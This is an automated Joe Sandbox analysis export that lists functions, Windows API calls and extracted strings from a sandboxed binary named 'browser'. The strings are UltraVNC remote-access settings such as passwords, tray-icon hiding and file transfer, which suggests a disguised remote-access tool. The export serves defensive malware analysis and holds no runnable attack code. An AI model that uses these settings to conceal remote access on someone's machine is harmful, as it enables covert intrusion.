Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Sleep_errno
String ID:
API String ID: 1068366078-0
Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
Instruction ID: f9576d750f3582b027a5435e6a6d7dd3431fbd25299ea068967620697b2669d4
Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
Instruction Fuzzy Hash: 79018F22A34A8189EB64AB379851069F6A5EB88BD0B991131DE5D03B94CF38F892C701

Non-executed Functions

Function 00007FF790C381AD Relevance: 463.1, APIs: 192, Strings: 72, Instructions: 1063COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB

Part of subcall function 00007FF790C3D480: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D4AB

Part of subcall function 00007FF790CE7DE8: _errno.LIBCMT ref: 00007FF790CE7E00
Part of subcall function 00007FF790CE7DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7E0C

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C38270
wsprintfA.USER32 ref: 00007FF790C38290
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C382B0
GetLastError.KERNEL32 ref: 00007FF790C382BA

Part of subcall function 00007FF790C3A040: OpenInputDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A07A
Part of subcall function 00007FF790C3A040: GetCurrentThreadId.KERNEL32 ref: 00007FF790C3A083
Part of subcall function 00007FF790C3A040: GetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A08B
Part of subcall function 00007FF790C3A040: SetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0A6
Part of subcall function 00007FF790C3A040: MessageBoxA.USER32 ref: 00007FF790C3A0B7
Part of subcall function 00007FF790C3A040: SetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0C2
Part of subcall function 00007FF790C3A040: CloseDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0CB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C38309
wsprintfA.USER32 ref: 00007FF790C38320
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C38340
GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C3835B
wsprintfA.USER32 ref: 00007FF790C38372
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C38392
GetPrivateProfileStringA.KERNEL32 ref: 00007FF790C383C1
GetPrivateProfileStringA.KERNEL32 ref: 00007FF790C383F0
GetPrivateProfileStringA.KERNEL32 ref: 00007FF790C3841F
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C3843B
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C38457
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C38473
GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C3848E
GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C384AB
GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C384C8
wsprintfA.USER32 ref: 00007FF790C384E1
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C38501

Strings

IdleTimeout, xrefs: 00007FF790C38E2B, 00007FF790C38FB5
DSMPluginConfig, xrefs: 00007FF790C389CD, 00007FF790C389F5
OnlyPollConsole, xrefs: 00007FF790C394E5, 00007FF790C396EC
DSMPlugin, xrefs: 00007FF790C3892F, 00007FF790C38986
TurboMode, xrefs: 00007FF790C39473, 00007FF790C39610
BlankMonitorEnabled, xrefs: 00007FF790C38B50, 00007FF790C38C7D
AllowLoopback, xrefs: 00007FF790C387E0, 00007FF790C38896
BlankInputsOnly, xrefs: 00007FF790C38B70, 00007FF790C38CB4
DefaultScale, xrefs: 00007FF790C38B8D, 00007FF790C38CEB
EnableDriver, xrefs: 00007FF790C3953F, 00007FF790C39795
PollFullScreen, xrefs: 00007FF790C394C8, 00007FF790C396B5
RemoveAero, xrefs: 00007FF790C38FE8, 00007FF790C3905D
passwd2, xrefs: 00007FF790C39225, 00007FF790C39255
InputsEnabled, xrefs: 00007FF790C39278, 00007FF790C39348
PortNumber, xrefs: 00007FF790C38DEF, 00007FF790C38F47
DebugLevel, xrefs: 00007FF790C3861B, 00007FF790C3873F
AuthRequired, xrefs: 00007FF790C38800, 00007FF790C388CD
AllowProperties, xrefs: 00007FF790C38A33, 00007FF790C38AC3
AllowShutdown, xrefs: 00007FF790C38A0D, 00007FF790C38A8C
SingleWindowName, xrefs: 00007FF790C395CC, 00007FF790C39860
UseRegistry, xrefs: 00007FF790C38252, 00007FF790C382A2
group2, xrefs: 00007FF790C383D7, 00007FF790C38446
EnableHook, xrefs: 00007FF790C3955E, 00007FF790C397CE
FileTransferEnabled, xrefs: 00007FF790C38B12, 00007FF790C38C0F
locdom3, xrefs: 00007FF790C384B5, 00007FF790C38561
Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission., xrefs: 00007FF790C382C5
DisableTrayIcon, xrefs: 00007FF790C38636, 00007FF790C38776
FTUserImpersonation, xrefs: 00007FF790C38B30, 00007FF790C38C46
LockSetting, xrefs: 00007FF790C39293, 00007FF790C3937F
PollUnderCursor, xrefs: 00007FF790C3948E, 00007FF790C39647
SocketConnect, xrefs: 00007FF790C38D71, 00007FF790C38E6B
QueryTimeout, xrefs: 00007FF790C39090, 00007FF790C39140
Avilog, xrefs: 00007FF790C38594, 00007FF790C386C8
clearconsole, xrefs: 00007FF790C39308, 00007FF790C3945B
XDMCPConnect, xrefs: 00007FF790C38DAF, 00007FF790C38ED9
QuerySetting, xrefs: 00007FF790C39075, 00007FF790C39109
primary, xrefs: 00007FF790C38BAE, 00007FF790C38D22
AllowEditClients, xrefs: 00007FF790C38A4B, 00007FF790C38AFA
group1, xrefs: 00007FF790C383A8, 00007FF790C3842A
admin_auth, xrefs: 00007FF790C383AF, 00007FF790C383DE, 00007FF790C3840D, 00007FF790C38431, 00007FF790C3844D, 00007FF790C38469, 00007FF790C38484, 00007FF790C3849F, 00007FF790C384BC, 00007FF790C384FA, 00007FF790C38531, 00007FF790C38568
SingleWindow, xrefs: 00007FF790C3959B, 00007FF790C39840
, xrefs: 00007FF790C395DF
AuthHosts, xrefs: 00007FF790C3895B, 00007FF790C3899F
UltraVNC, xrefs: 00007FF790C391D4, 00007FF790C391FF, 00007FF790C3922C, 00007FF790C3925C
MSLogonRequired, xrefs: 00007FF790C382E8, 00007FF790C38332
group3, xrefs: 00007FF790C38406, 00007FF790C38462
OnlyPollOnEvent, xrefs: 00007FF790C39506, 00007FF790C39723
poll, xrefs: 00007FF790C3947A, 00007FF790C39495, 00007FF790C394B2, 00007FF790C394CF, 00007FF790C394EC, 00007FF790C3950D, 00007FF790C39528, 00007FF790C39546, 00007FF790C39565, 00007FF790C39583, 00007FF790C395A2, 00007FF790C395D8, 00007FF790C39617, 00007FF790C3964E, 00007FF790C39685, 00007FF790C396BC, 00007FF790C396F3, 00007FF790C3972A, 00007FF790C39765, 00007FF790C3979C, 00007FF790C397D5, 00007FF790C3980E, 00007FF790C39847, 00007FF790C39867, 00007FF790C3987F, 00007FF790C398B9
locdom2, xrefs: 00007FF790C38498, 00007FF790C3852A
MaxCpu, xrefs: 00007FF790C39521, 00007FF790C3975E, 00007FF790C39878, 00007FF790C398B2
NewMSLogon, xrefs: 00007FF790C3834A, 00007FF790C38384
passwd, xrefs: 00007FF790C391CD, 00007FF790C391F8
AutoPortSelect, xrefs: 00007FF790C38DD7, 00007FF790C38F10
QueryAccept, xrefs: 00007FF790C390AD, 00007FF790C39177
path, xrefs: 00007FF790C385C3, 00007FF790C386E8
PollForeground, xrefs: 00007FF790C394AB, 00007FF790C3967E
secondary, xrefs: 00007FF790C38BCF, 00007FF790C38D59
HTTPPortNumber, xrefs: 00007FF790C38E0D, 00007FF790C38F7E
ConnectPriority, xrefs: 00007FF790C38820, 00007FF790C38904
QueryIfNoLogon, xrefs: 00007FF790C390CA, 00007FF790C391AE
locdom1, xrefs: 00007FF790C3847D, 00007FF790C384F3
LocalInputsDisabled, xrefs: 00007FF790C392B0, 00007FF790C393B6
EnableVirtual, xrefs: 00007FF790C3957C, 00007FF790C39807
DebugMode, xrefs: 00007FF790C38579, 00007FF790C38691
LoopbackOnly, xrefs: 00007FF790C38653, 00007FF790C387AD
accept_reject_mesg, xrefs: 00007FF790C385FB, 00007FF790C38708
kickrdp, xrefs: 00007FF790C392EA, 00007FF790C39424
RemoveWallpaper, xrefs: 00007FF790C38FCD, 00007FF790C39026
EnableJapInput, xrefs: 00007FF790C392CD, 00007FF790C393ED
HTTPConnect, xrefs: 00007FF790C38D8F, 00007FF790C38EA2
admin, xrefs: 00007FF790C38259, 00007FF790C382A9, 00007FF790C382EF, 00007FF790C38339, 00007FF790C38351, 00007FF790C3838B, 00007FF790C38580, 00007FF790C3859B, 00007FF790C385CF, 00007FF790C38602, 00007FF790C38622, 00007FF790C3863D, 00007FF790C3865A, 00007FF790C38698, 00007FF790C386CF, 00007FF790C386EF, 00007FF790C3870F, 00007FF790C38746, 00007FF790C3877D, 00007FF790C387B4, 00007FF790C387CC, 00007FF790C387E7, 00007FF790C38807, 00007FF790C38827, 00007FF790C38866, 00007FF790C3889D, 00007FF790C388D4, 00007FF790C3890B, 00007FF790C38936, 00007FF790C38962, 00007FF790C3898D, 00007FF790C389A6, 00007FF790C389D4, 00007FF790C389FC, 00007FF790C38A14, 00007FF790C38A3A, 00007FF790C38A52, 00007FF790C38A93, 00007FF790C38ACA, 00007FF790C38B01, 00007FF790C38B19, 00007FF790C38B37, 00007FF790C38B57, 00007FF790C38B77, 00007FF790C38B94, 00007FF790C38BB5, 00007FF790C38BD6, 00007FF790C38C16, 00007FF790C38C4D, 00007FF790C38C84, 00007FF790C38CBB, 00007FF790C38CF2, 00007FF790C38D29, 00007FF790C38D60, 00007FF790C38D78, 00007FF790C38D96, 00007FF790C38DB6, 00007FF790C38DDE, 00007FF790C38DF6, 00007FF790C38E14, 00007FF790C38E32, 00007FF790C38E72, 00007FF790C38EA9, 00007FF790C38EE0, 00007FF790C38F17, 00007FF790C38F4E, 00007FF790C38F85, 00007FF790C38FBC, 00007FF790C38FD4, 00007FF790C38FEF, 00007FF790C3902D, 00007FF790C39064, 00007FF790C3907C, 00007FF790C39097, 00007FF790C390B4, 00007FF790C390D1, 00007FF790C39110, 00007FF790C39147, 00007FF790C3917E, 00007FF790C391B5, 00007FF790C3927F, 00007FF790C3929A, 00007FF790C392B7, 00007FF790C392D4, 00007FF790C392F1, 00007FF790C3930F, 00007FF790C3934F, 00007FF790C39386, 00007FF790C393BD, 00007FF790C393F4, 00007FF790C3942B, 00007FF790C39462
UseDSMPlugin, xrefs: 00007FF790C387C5, 00007FF790C3885F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
API String ID: 634683900-3478490838
Opcode ID: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
Instruction ID: 736614ea0d92d725ed9d2d912e67fae1aa94708fe677654b874bb90afc70b960
Opcode Fuzzy Hash: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
Instruction Fuzzy Hash: ECE2B571A29A4BE5EB64EF74E8505E8A370FB45B48FC06032D50D07A68DE7DF24AC760

Function 00007FF790C3E1D0 Relevance: 457.8, APIs: 190, Strings: 71, Instructions: 1023COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790CE7978: malloc.LIBCMT ref: 00007FF790CE7992

Part of subcall function 00007FF790CE7978: _callnewh.LIBCMT ref: 00007FF790CE7986

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C3E253
wsprintfA.USER32 ref: 00007FF790C3E268
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C3E284
GetLastError.KERNEL32 ref: 00007FF790C3E28E
_itow.LIBCMT ref: 00007FF790C3E2A1

Part of subcall function 00007FF790CE95C0: xtoa.LIBCMT ref: 00007FF790CE95DC

Part of subcall function 00007FF790C3A040: OpenInputDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A07A
Part of subcall function 00007FF790C3A040: GetCurrentThreadId.KERNEL32 ref: 00007FF790C3A083
Part of subcall function 00007FF790C3A040: GetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A08B
Part of subcall function 00007FF790C3A040: SetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0A6
Part of subcall function 00007FF790C3A040: MessageBoxA.USER32 ref: 00007FF790C3A0B7
Part of subcall function 00007FF790C3A040: SetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0C2
Part of subcall function 00007FF790C3A040: CloseDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0CB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C3E2E2
wsprintfA.USER32 ref: 00007FF790C3E2F7
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C3E313
GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C3E32D
wsprintfA.USER32 ref: 00007FF790C3E342
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C3E35E
GetPrivateProfileStringA.KERNEL32 ref: 00007FF790C3E389
GetPrivateProfileStringA.KERNEL32 ref: 00007FF790C3E3B4
GetPrivateProfileStringA.KERNEL32 ref: 00007FF790C3E3DF
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C3E3F9
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C3E413
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C3E42D
GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C3E447
GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C3E463
GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C3E47F
wsprintfA.USER32 ref: 00007FF790C3E496
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C3E4B2
wsprintfA.USER32 ref: 00007FF790C3E4C7

Strings

IdleTimeout, xrefs: 00007FF790C3ED30, 00007FF790C3EE9B
OnlyPollConsole, xrefs: 00007FF790C3F372, 00007FF790C3F566
DSMPlugin, xrefs: 00007FF790C3E877, 00007FF790C3E8CC
TurboMode, xrefs: 00007FF790C3F2FE, 00007FF790C3F4A2
BlankMonitorEnabled, xrefs: 00007FF790C3EA29, 00007FF790C3EB62
AllowLoopback, xrefs: 00007FF790C3E74B, 00007FF790C3E7F3
BlankInputsOnly, xrefs: 00007FF790C3EA48, 00007FF790C3EB93
DefaultScale, xrefs: 00007FF790C3EA64, 00007FF790C3EBC4
FileTransferTimeout, xrefs: 00007FF790C3EA84, 00007FF790C3EBF8
EnableDriver, xrefs: 00007FF790C3F3D1, 00007FF790C3F5FB
PollFullScreen, xrefs: 00007FF790C3F353, 00007FF790C3F535
RemoveAero, xrefs: 00007FF790C3EECE, 00007FF790C3EF37
passwd2, xrefs: 00007FF790C3F0DF, 00007FF790C3F106
InputsEnabled, xrefs: 00007FF790C3F125, 00007FF790C3F1F0
PortNumber, xrefs: 00007FF790C3ECF6, 00007FF790C3EE33
DebugLevel, xrefs: 00007FF790C3E5AE, 00007FF790C3E6B8
AuthRequired, xrefs: 00007FF790C3E76A, 00007FF790C3E824
AllowProperties, xrefs: 00007FF790C3E91A, 00007FF790C3E9A5
AllowShutdown, xrefs: 00007FF790C3E8FD, 00007FF790C3E974
SingleWindowName, xrefs: 00007FF790C3F462, 00007FF790C3F6AF
UseRegistry, xrefs: 00007FF790C3E23A, 00007FF790C3E273
group2, xrefs: 00007FF790C3E396, 00007FF790C3E3FF
EnableHook, xrefs: 00007FF790C3F3F0, 00007FF790C3F62E
FileTransferEnabled, xrefs: 00007FF790C3E9ED, 00007FF790C3EB00
locdom3, xrefs: 00007FF790C3E471, 00007FF790C3E503
DisableTrayIcon, xrefs: 00007FF790C3E5C8, 00007FF790C3E6E9
FTUserImpersonation, xrefs: 00007FF790C3EA0A, 00007FF790C3EB34
LockSetting, xrefs: 00007FF790C3F142, 00007FF790C3F21E
PollUnderCursor, xrefs: 00007FF790C3F31B, 00007FF790C3F4D3
SocketConnect, xrefs: 00007FF790C3EC76, 00007FF790C3ED6F
QueryTimeout, xrefs: 00007FF790C3EF6B, 00007FF790C3F016
Avilog, xrefs: 00007FF790C3E534, 00007FF790C3E64E
clearconsole, xrefs: 00007FF790C3F1B3, 00007FF790C3F2E2
XDMCPConnect, xrefs: 00007FF790C3ECB2, 00007FF790C3EDD1
QuerySetting, xrefs: 00007FF790C3EF4E, 00007FF790C3EFE5
primary, xrefs: 00007FF790C3EAA4, 00007FF790C3EC29
AllowEditClients, xrefs: 00007FF790C3E939, 00007FF790C3E9D6
group1, xrefs: 00007FF790C3E36B, 00007FF790C3E3E5
admin_auth, xrefs: 00007FF790C3E372, 00007FF790C3E39D, 00007FF790C3E3C8, 00007FF790C3E3EC, 00007FF790C3E406, 00007FF790C3E420, 00007FF790C3E43A, 00007FF790C3E454, 00007FF790C3E478, 00007FF790C3E4A8, 00007FF790C3E4D9, 00007FF790C3E50A
SingleWindow, xrefs: 00007FF790C3F433, 00007FF790C3F694
AuthHosts, xrefs: 00007FF790C3E8A4, 00007FF790C3E8E3
UltraVNC, xrefs: 00007FF790C3F09B, 00007FF790C3F0BF, 00007FF790C3F0E6, 00007FF790C3F10D
MSLogonRequired, xrefs: 00007FF790C3E2BE, 00007FF790C3E302
group3, xrefs: 00007FF790C3E3C1, 00007FF790C3E419
OnlyPollOnEvent, xrefs: 00007FF790C3F395, 00007FF790C3F597
poll, xrefs: 00007FF790C3F305, 00007FF790C3F322, 00007FF790C3F33E, 00007FF790C3F35A, 00007FF790C3F379, 00007FF790C3F39C, 00007FF790C3F3B3, 00007FF790C3F3D8, 00007FF790C3F3F7, 00007FF790C3F41A, 00007FF790C3F43A, 00007FF790C3F46E, 00007FF790C3F4A9, 00007FF790C3F4DA, 00007FF790C3F50B, 00007FF790C3F53C, 00007FF790C3F56D, 00007FF790C3F59E, 00007FF790C3F5CF, 00007FF790C3F602, 00007FF790C3F635, 00007FF790C3F668, 00007FF790C3F69B, 00007FF790C3F6B6
locdom2, xrefs: 00007FF790C3E44D, 00007FF790C3E4D2
MaxCpu, xrefs: 00007FF790C3F3AC, 00007FF790C3F5C8
NewMSLogon, xrefs: 00007FF790C3E319, 00007FF790C3E34D
passwd, xrefs: 00007FF790C3F094, 00007FF790C3F0B8
AutoPortSelect, xrefs: 00007FF790C3ECD1, 00007FF790C3EE02
QueryAccept, xrefs: 00007FF790C3EF8A, 00007FF790C3F04A
path, xrefs: 00007FF790C3E55B, 00007FF790C3E669
PollForeground, xrefs: 00007FF790C3F337, 00007FF790C3F504
secondary, xrefs: 00007FF790C3EAC1, 00007FF790C3EC5A
HTTPPortNumber, xrefs: 00007FF790C3ED10, 00007FF790C3EE64
ConnectPriority, xrefs: 00007FF790C3E789, 00007FF790C3E855
QueryIfNoLogon, xrefs: 00007FF790C3EFA9, 00007FF790C3F078
locdom1, xrefs: 00007FF790C3E433, 00007FF790C3E4A1
LocalInputsDisabled, xrefs: 00007FF790C3F15E, 00007FF790C3F24F
, xrefs: 00007FF790C3F475
EnableVirtual, xrefs: 00007FF790C3F413, 00007FF790C3F661
DebugMode, xrefs: 00007FF790C3E51A, 00007FF790C3E620
LoopbackOnly, xrefs: 00007FF790C3E5E4, 00007FF790C3E71A
accept_reject_mesg, xrefs: 00007FF790C3E58D, 00007FF790C3E687
kickrdp, xrefs: 00007FF790C3F196, 00007FF790C3F2B1
RemoveWallpaper, xrefs: 00007FF790C3EEB4, 00007FF790C3EF06
EnableJapInput, xrefs: 00007FF790C3F17A, 00007FF790C3F280
HTTPConnect, xrefs: 00007FF790C3EC93, 00007FF790C3EDA0
admin, xrefs: 00007FF790C3E241, 00007FF790C3E27A, 00007FF790C3E2C5, 00007FF790C3E309, 00007FF790C3E320, 00007FF790C3E354, 00007FF790C3E521, 00007FF790C3E53B, 00007FF790C3E562, 00007FF790C3E594, 00007FF790C3E5B5, 00007FF790C3E5CF, 00007FF790C3E5EB, 00007FF790C3E627, 00007FF790C3E655, 00007FF790C3E670, 00007FF790C3E68E, 00007FF790C3E6BF, 00007FF790C3E6F0, 00007FF790C3E721, 00007FF790C3E738, 00007FF790C3E752, 00007FF790C3E771, 00007FF790C3E790, 00007FF790C3E7C9, 00007FF790C3E7FA, 00007FF790C3E82B, 00007FF790C3E85C, 00007FF790C3E87E, 00007FF790C3E8AB, 00007FF790C3E8D3, 00007FF790C3E8EA, 00007FF790C3E904, 00007FF790C3E921, 00007FF790C3E940, 00007FF790C3E97B, 00007FF790C3E9AC, 00007FF790C3E9DD, 00007FF790C3E9F4, 00007FF790C3EA11, 00007FF790C3EA30, 00007FF790C3EA4F, 00007FF790C3EA6B, 00007FF790C3EA8B, 00007FF790C3EAAB, 00007FF790C3EAC8, 00007FF790C3EB07, 00007FF790C3EB3B, 00007FF790C3EB69, 00007FF790C3EB9A, 00007FF790C3EBCB, 00007FF790C3EBFF, 00007FF790C3EC30, 00007FF790C3EC61, 00007FF790C3EC7D, 00007FF790C3EC9A, 00007FF790C3ECB9, 00007FF790C3ECD8, 00007FF790C3ECFD, 00007FF790C3ED17, 00007FF790C3ED37, 00007FF790C3ED76, 00007FF790C3EDA7, 00007FF790C3EDD8, 00007FF790C3EE09, 00007FF790C3EE3A, 00007FF790C3EE6B, 00007FF790C3EEA2, 00007FF790C3EEBB, 00007FF790C3EED5, 00007FF790C3EF0D, 00007FF790C3EF3E, 00007FF790C3EF55, 00007FF790C3EF72, 00007FF790C3EF91, 00007FF790C3EFB0, 00007FF790C3EFEC, 00007FF790C3F01D, 00007FF790C3F051, 00007FF790C3F07F, 00007FF790C3F12C, 00007FF790C3F149, 00007FF790C3F165, 00007FF790C3F181, 00007FF790C3F19D, 00007FF790C3F1BA, 00007FF790C3F1F7, 00007FF790C3F225, 00007FF790C3F256, 00007FF790C3F287, 00007FF790C3F2B8, 00007FF790C3F2E9
UseDSMPlugin, xrefs: 00007FF790C3E731, 00007FF790C3E7C2

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
API String ID: 341937111-959611688
Opcode ID: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
Instruction ID: 5246fa7ea587266e54e50168a0f137485f49a419236e9242701960b0275de963
Opcode Fuzzy Hash: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
Instruction Fuzzy Hash: 8FC2F965A28A0791EE64EB71E8905A5F370FB45B88FC06432D90D13B68EE7DF24DC760

Function 00007FF790C4A130 Relevance: 79.1, APIs: 28, Strings: 17, Instructions: 317threadregistrysleepCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF790C4A176
OpenInputDesktop.USER32 ref: 00007FF790C4A186
GetCurrentThreadId.KERNEL32 ref: 00007FF790C4A1B0
GetThreadDesktop.USER32 ref: 00007FF790C4A1B8
GetUserObjectInformationA.USER32 ref: 00007FF790C4A1E9
SetThreadDesktop.USER32 ref: 00007FF790C4A231
OpenProcess.KERNEL32 ref: 00007FF790C4A2B4
OpenProcessToken.ADVAPI32 ref: 00007FF790C4A2D3
CloseHandle.KERNEL32 ref: 00007FF790C4A2E0
GetModuleFileNameA.KERNEL32 ref: 00007FF790C4A2FA
CreateProcessAsUserA.ADVAPI32 ref: 00007FF790C4A3C9
GetLastError.KERNEL32 ref: 00007FF790C4A3CF
CloseHandle.KERNEL32 ref: 00007FF790C4A3E0
CloseHandle.KERNEL32 ref: 00007FF790C4A3EF
OpenEventA.KERNEL32 ref: 00007FF790C4A420
SetEvent.KERNEL32 ref: 00007FF790C4A439
RegOpenKeyExA.ADVAPI32 ref: 00007FF790C4A46A
RegQueryValueExA.ADVAPI32 ref: 00007FF790C4A4A2
RegCloseKey.ADVAPI32 ref: 00007FF790C4A4AD
OpenEventA.KERNEL32 ref: 00007FF790C4A4D8
SetEvent.KERNEL32 ref: 00007FF790C4A4F1
GetModuleFileNameA.KERNEL32 ref: 00007FF790C4A50B
GetDesktopWindow.USER32 ref: 00007FF790C4A5A4
ShellExecuteA.SHELL32 ref: 00007FF790C4A5CF
InitializeCriticalSection.KERNEL32 ref: 00007FF790C4A627
Sleep.KERNEL32 ref: 00007FF790C4A693
SetThreadDesktop.USER32 ref: 00007FF790C4A6A1
CloseDesktop.USER32 ref: 00007FF790C4A6AF

Strings

